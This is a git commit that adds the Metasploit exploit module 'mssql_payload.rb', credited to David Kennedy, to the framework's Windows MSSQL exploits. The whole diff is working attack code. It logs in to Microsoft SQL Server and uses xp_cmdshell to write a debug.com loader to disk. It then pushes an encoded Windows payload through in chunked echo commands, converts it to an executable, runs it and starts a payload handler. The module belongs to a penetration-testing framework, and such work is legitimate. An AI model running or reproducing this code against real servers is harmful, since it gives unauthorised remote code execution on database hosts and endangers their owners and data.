Adds ReL1K's mssql_payload module

git-svn-id: file:///home/svn/framework3/trunk@7162 4d416f70-5f16-0410-b530-b9f4589650da
2024-11-12 11:52:01 +01:00 · 2009-10-14 21:11:28 +00:00 · 2009-10-14 21:11:28 +00:00 · 59676df4db
commit 59676df4db
parent 3b49e2af58
1 changed files with 99 additions and 0 deletions
--- a/modules/exploits/windows/mssql/mssql_payload.rb
+++ b/modules/exploits/windows/mssql/mssql_payload.rb
@ -0,0 +1,99 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+	include Msf::Exploit::Remote::MSSQL
+
+	def initialize(info = {})
+
+		super(update_info(info,
+			'Name'           => 'Microsoft SQL Server Payload Execution',
+			'Description'    => %q{
+					This module will execute an arbitrary payload on a Microsoft SQL
+				Server, using the Windows debug.com method for writing an executable to disk
+				and the xp_cmdshell stored procedure. File size restrictions are avoided by 
+				incorporating the debug	bypass method presented at Defcon 17 by SecureState.
+				Note that this module will leave a metasploit payload in the Windows
+				System32 directory which must be manually deleted once the attack is completed.
+			},
+			'Author'         => [ 'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+
+					[ 'URL', 'http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf'],
+				],
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Automatic', { } ],
+				],
+			'DefaultTarget'  => 0 
+			))
+
+		register_options( [
+			OptPath.new('HEX2BINARY',   [ false, "The path to the hex2binary script on the disk", 
+				File.join(Msf::Config.install_root, "data", "exploits", "mssql", "h2b")
+			])
+		], self.class)
+	end
+
+	def exploit
+
+		var_bypass  = rand_text_alpha(8)
+		var_payload = rand_text_alpha(8)
+		
+		debug = false # enable to see the output
+		
+		if(not mssql_login_datastore) 
+			print_status("Invalid SQL Server credentials")
+			return
+		end
+		
+		print_status("Warning: This exploit will leave #{var_payload}.exe in the System32 directory of the target")
+		
+		hex = Msf::Util::EXE.to_win32pe(framework,payload.encoded).unpack("H*")[0]		
+
+		print_status("Writing the debug.com loader to the disk...")
+		h2b = File.read(datastore['HEX2BINARY'], File.size(datastore['HEX2BINARY']))
+		h2b.gsub!(/KemneE3N/, "%TEMP%\\#{var_bypass}")
+		h2b.split(/\n/).each do |line|
+			mssql_xpcmdshell("#{line}", false) 
+		end
+
+		print_status("Converting the debug script to an executable...")
+		mssql_xpcmdshell("cmd.exe /c cd %TEMP% && cd %TEMP% && debug < %TEMP%\\#{var_bypass}", debug) 
+		mssql_xpcmdshell("cmd.exe /c move %TEMP%\\#{var_bypass}.bin %TEMP%\\#{var_bypass}.exe", debug) 
+		
+		print_status("Uploading the payload, please be patient...")
+		idx = 0
+		cnt = 500
+		while(idx < hex.length - 1)
+			mssql_xpcmdshell("cmd.exe /c echo #{hex[idx,cnt]}>>%TEMP%\\#{var_payload}", false)
+			idx += cnt
+		end
+		
+		print_status("Converting the encoded payload...")
+		mssql_xpcmdshell("cmd.exe /c %TEMP%\\#{var_bypass}.exe %TEMP%\\#{var_payload}", debug) 
+		mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_bypass}.exe", debug) 
+		mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_payload}", debug) 
+		
+		print_status("Executing the payload...")
+		mssql_xpcmdshell("cmd.exe /c %TEMP%\\#{var_payload}.exe", false, {:timeout => 1}) 
+
+		handler
+		disconnect
+	end
+end